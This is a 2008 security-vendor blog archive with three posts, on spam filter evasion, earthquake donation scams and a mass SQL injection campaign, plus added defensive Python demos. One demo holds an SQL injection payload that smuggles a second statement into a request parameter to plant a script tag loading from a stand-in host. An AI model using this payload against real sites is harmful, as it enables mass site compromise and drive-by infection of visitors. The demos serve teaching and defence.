
Archive for May 21st, 2008


May21
by JM Hipolito (Technical Communications)

Thirty years after it was first named, spam is still alive and well, and medicine spam in particular has lost none of its appeal to spammers.

A spam alert was recently released by the Trend Micro Content Security team regarding spam offering cheap medicine from what seems to be the same Canadian Pharmacy Web site we observed here.

The message combines several techniques to evade antispam filtering:

  • Inserting HTML tags in the middle of the spammy words, so no trigger keyword appears as a contiguous string
  • Hiding the real spam link behind a very long, hex (percent-) encoded URL
  • Placing tabs between the characters of individual words

Antispam engineers at TrendLabs believe that although none of the employed techniques is new by itself, their combination in this specific spam run is noteworthy. It may mean spammers are working out how spam filtering techniques operate and finding ways around them.
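As an added example (not code from the original post or from Trend Micro), the script below applies the three tricks listed above to a constructed message and shows why a plain keyword filter misses it, then undoes each trick: tags are stripped, the percent-encoded href is decoded, and all non-alphanumerics (including the tabs) are squashed out before matching. It also surfaces the "dummy URL" trick from the screenshot, where the anchor text shows one address and the href points to another. The sample text, the keyword list and the example.test domain are assumptions for the demo.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample message, not the one from the original post. It applies the
# three evasion tricks the post lists (tags splitting words, tabs between letters,
# a hex/percent-encoded link behind innocuous anchor text) to made-up content;
# example.test is a reserved, non-routable domain.
SAMPLE = (
    "Buy <b></b>Vi<span></span>ag<i></i>ra and C\ti\ta\tl\ti\ts cheap! "
    '<a href="http://example.test/%43%61%6e%61%64%69%61%6e-%70%68%61%72%6d%61%63%79/%6f%72%64%65%72">'
    "http://example.test/news</a>"
)

SPAM_TERMS = ("viagra", "cialis", "canadian pharmacy")

TAG_RE = re.compile(r"<[^>]+>")
ANCHOR_RE = re.compile(r"<a\b[^>]*href\s*=\s*[\"']([^\"']+)[\"'][^>]*>(.*?)</a>", re.I | re.S)


def naive_hits(raw):
    """What a plain substring filter sees: the raw message, case-folded."""
    low = raw.lower()
    return [t for t in SPAM_TERMS if t in low]


def real_links(raw):
    """href targets with percent-encoding undone, collected before tags are stripped."""
    return [unquote(href) for href, _text in ANCHOR_RE.findall(raw)]


def squash(text):
    """Case-fold and drop everything except letters and digits, so tabs, spaces,
    punctuation and leftover markup noise cannot split a keyword."""
    return re.sub(r"[^a-z0-9]", "", text.lower())


def normalized_hits(raw):
    """Spam terms found after undoing all three tricks."""
    visible = html.unescape(TAG_RE.sub("", raw))          # "Vi<span></span>ag" -> "Viag"
    haystack = squash(visible + " " + " ".join(real_links(raw)))
    return [t for t in SPAM_TERMS if squash(t) in haystack]


def deceptive_links(raw):
    """(displayed text, real target) pairs where the anchor text looks like a URL
    but the href points elsewhere: the 'dummy URL' trick."""
    out = []
    for href, text in ANCHOR_RE.findall(raw):
        shown = TAG_RE.sub("", text).strip()
        target = unquote(href)
        if shown.lower().startswith("http") and shown != target:
            out.append((shown, target))
    return out


if __name__ == "__main__":
    print("naive filter sees:     ", naive_hits(SAMPLE))
    print("after normalization:   ", normalized_hits(SAMPLE))
    print("shown vs. real targets:", deceptive_links(SAMPLE))
```

The squash step is deliberately blunt: it also merges genuine word boundaries, which is acceptable for a keyword pass because the match is run on a normalized copy while the original message is kept for any further scoring.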

Below is a screenshot of the spammed message:

The link displayed in the message is a dummy URL: it connects to a Web site different from the one shown. Clicking the link takes the user to a Canadian Pharmacy Web site that sells cheap medicine such as Cialis and Viagra. Here is a screenshot of the offending Web site:

No worries, though: our spam definitions recognize this strain in spite of its strategic combination of filter-evasion techniques.

 
Posted in Spam

May21
by JM Hipolito (Technical Communications)


Most of the time it is, but it is when faced with true horror that we see the best within ourselves and within others, and also the worst. The depths people are willing to sink to just for money are appalling.

For the longest time, no calamity or tragedy has occurred that was not exploited in some way by cyber criminals for their own gain, be it a natural disaster like Hurricane Katrina or the California wildfires, an accident, a political dispute, or a tragic death.

The recent earthquake in China is no different. Like any other tragedy, it has triggered two human instincts that show the best and the worst of human nature: (1) to help, and (2) to take advantage.

Now, in the midst of the mourning in Sichuan, another tragedy unfolds as cyber criminals prey on those who yearn to help the victims survive this dreadful ordeal. In one report, scammers sent out text messages enticing people to send donations supposedly to fund aid for helpless victims. Today we also caught a sample of a spam message, allegedly from a Filipino seeking financial aid to follow his wounded wife to China.

Here are the first and last portions of the long-winded letter, designed to move merciful recipients to action, i.e., to donate money:


Figure 1. The letter starts off as a heart-wrenching plea for help.



Figure 2. The letter ends with the sender’s email address should readers wish to contact him and give him money.


These schemes, much like those that surfaced during previous tragedies, are surely only some of the many that will continue to use this ploy.

In an even more tragic turn, we came across reports that the official Web site for donations to the earthquake victims in China, that of the Chinese Red Cross, has itself been hacked to divert donations elsewhere. The irony is startling, as it prevents us from simply advising users to donate only to legitimate organizations.

We therefore recommend that users remain extremely cautious in extending their help, and choose channels where they can keep a closer watch on who receives the donation and where it goes.

 
Posted in Spam

May21
by Dianne Lagrimas (Technical Communications)

Barely recovering from the flurry of analysis surrounding the weekend compromise, Trend Micro researchers in Taiwan have discovered yet another new attack.

Hackers have apparently conducted another massive SQL injection attack, causing well over 160,000 Web sites to contain a certain malicious script. The affected sites seem to be quite diverse, although a big chunk belongs to the Asia Pacific region.
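The post does not show the injected SQL, so the following is an added illustration (not the attackers' payload or any Trend Micro code) of the coding pattern that lets a single injected request rewrite every stored page on a site. The vulnerable function pastes a request parameter into the SQL text and hands it to a driver call that accepts several statements in one batch; Python's sqlite3 executescript stands in for that batch behaviour here, and the script tag, table layout and example.test domain are all assumptions for the demo. The parameterized version binds the value instead, so the appended statement is never parsed as SQL.

```python
import sqlite3

# Constructed demo, not the script or payload from the attack in the post. The
# tag below stands in for whatever the attackers appended to stored content;
# example.test is a reserved, non-routable domain.
INJECTED_TAG = '<script src="http://example.test/x.js"></script>'

# What an attacker sends as the "id" request parameter: a valid value, a
# statement terminator, and a second statement that rewrites every row.
PAYLOAD = "1; UPDATE articles SET body = body || '" + INJECTED_TAG + "'"


def make_db():
    """Fresh in-memory table with two ordinary articles."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT,
                               views INTEGER NOT NULL DEFAULT 0);
        INSERT INTO articles (id, title, body) VALUES (1, 'Welcome', 'Hello from a legitimate site.');
        INSERT INTO articles (id, title, body) VALUES (2, 'News', 'Nothing malicious here.');
    """)
    return db


def vulnerable_hit_counter(db, article_id):
    """The 2008-era pattern: a request parameter pasted into SQL text and sent to a
    driver call that runs several statements per batch (MS SQL Server did;
    sqlite's executescript stands in for that behaviour here)."""
    sql = "UPDATE articles SET views = views + 1 WHERE id = " + article_id
    db.executescript(sql)


def safe_hit_counter(db, article_id):
    """Parameter binding: the value travels separately from the SQL text, so it is
    only ever compared against id and never parsed as a statement. Rejecting
    non-integers up front is defence in depth, not the main fix."""
    try:
        article_id = int(article_id)
    except ValueError:
        return 0
    cur = db.execute("UPDATE articles SET views = views + 1 WHERE id = ?", (article_id,))
    return cur.rowcount


def injected_rows(db):
    """How many stored articles now carry the foreign script tag."""
    return db.execute("SELECT count(*) FROM articles WHERE body LIKE '%<script%'").fetchone()[0]


def demo(counter):
    """Run a normal request and then the attack against a fresh table."""
    db = make_db()
    counter(db, "1")
    counter(db, PAYLOAD)
    return injected_rows(db)


if __name__ == "__main__":
    print("rows carrying the tag after the attack, vulnerable code:", demo(vulnerable_hit_counter))
    print("rows carrying the tag after the attack, parameterized: ", demo(safe_hit_counter))
```

One request against the vulnerable handler is enough to stamp the tag into both rows, which is how a single automated scan ends up marking six-figure numbers of pages; the parameterized handler leaves the table untouched.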


Figure 1. Trend Micro product in action, blocking access to sites containing this script.

Trend Micro detects the script as HTML_IFRAME.NG. When unsuspecting users visit one of these infected pages, they are redirected to any of three URLs hosting various exploits. The scripts found at these URLs are detected by Trend Micro as the following:

  • JS_REALPLR.CB
  • JS_REALPLR.CD
  • JS_DLOADER.JYT

JS_DLOADER.JYT, in turn, exploits the Microsoft Data Access Components (MDAC) vulnerability described in Microsoft Security Bulletin MS06-014.

JS_REALPLR.CB, JS_REALPLR.CD and JS_DLOADER.JYT all access a URL in the same domain, which downloads 1.exe onto the infected PC. Trend Micro detects 1.exe as TSPY_LINEAGE.PJ (update: as of this writing the file is detected as TROJ_AGENT.WPA).

The attack algorithm is illustrated below:


Figure 2. Attack algorithm

Users are bound to be infected by the aforementioned malware if their browsers allow automatic execution of ActiveX controls. Since users are viewing legitimate sites, it is highly likely that even when browsers are configured to prompt before running ActiveX controls or downloading scripts, users will still agree to the offered download.

Only a strong Web Threat Protection suite breaks the infection chain at several points of the attack. This becomes especially important considering that the final payload, 1.exe, appears to change with every download. If the user is prevented from accessing the URLs that the initial script redirects to in the first place, then the user is effectively protected from whatever threat the final payload may bring.
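Site owners can check their own pages for the first link in this chain, the injected tag, without waiting for a product to flag them. The scanner below is an added example (not Trend Micro's detection logic and not the HTML_IFRAME.NG signature): it parses a constructed page and reports every script or iframe whose source loads from a host other than the site's own, flagging zero-size iframes, the usual silent-redirect shape. The page content, the site host name and the example.org/example.test/example.net domains are assumptions for the demo.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page, not one of the compromised sites from the post. The first
# script tag is the site's own; the trailing iframe and script stand in for the
# kind of off-site tags a mass SQL injection leaves behind in stored content.
# example.org, example.test and example.net are reserved names.
SITE_HOST = "www.example.org"
SAMPLE_PAGE = """<html><head><title>Product catalogue</title>
<script src="/static/menu.js"></script></head>
<body><h1>Catalogue</h1><p>Item A</p>
<p>Item B<iframe src="http://example.test/in.cgi?3" width="0" height="0"></iframe></p>
<p>Contact us</p><script src="//example.net/1.js"></script>
</body></html>"""


class InjectedTagFinder(HTMLParser):
    """Collect script and iframe sources that load from a host other than the page's own."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("script", "iframe"):
            return
        a = {k: (v or "") for k, v in attrs}      # valueless attributes become ""
        src = a.get("src", "")
        if not src:
            return                                  # inline script: nothing remote to check
        host = (urlparse(src).hostname or self.site_host).lower()   # relative src -> own host
        if host == self.site_host:
            return
        self.findings.append({
            "tag": tag,
            "src": src,
            "host": host,
            # 0x0 iframes are the classic silent-redirect shape
            "hidden": tag == "iframe" and (a.get("width") == "0" or a.get("height") == "0"),
        })


def find_injected_tags(page_html, site_host):
    """Return every off-site script/iframe reference found in the page, in document order."""
    parser = InjectedTagFinder(site_host)
    parser.feed(page_html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for finding in find_injected_tags(SAMPLE_PAGE, SITE_HOST):
        print(finding)
```

A legitimate site will have some off-site script sources of its own (analytics, CDNs), so in practice the findings are diffed against an allow list; anything new, and anything hidden, is what to investigate, and it points straight at the database rows that were rewritten.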

Note: Our regional partners are now contacting the appropriate CERTs for the affected sites. We have also blocked all related malicious domains and added detection for all malicious files.

Consolidated findings of the Research (Taiwan), Escalation, and Threat Response teams at TrendLabs.

 


© Copyright 2008 Trend Micro Inc. All rights reserved. Legal Notice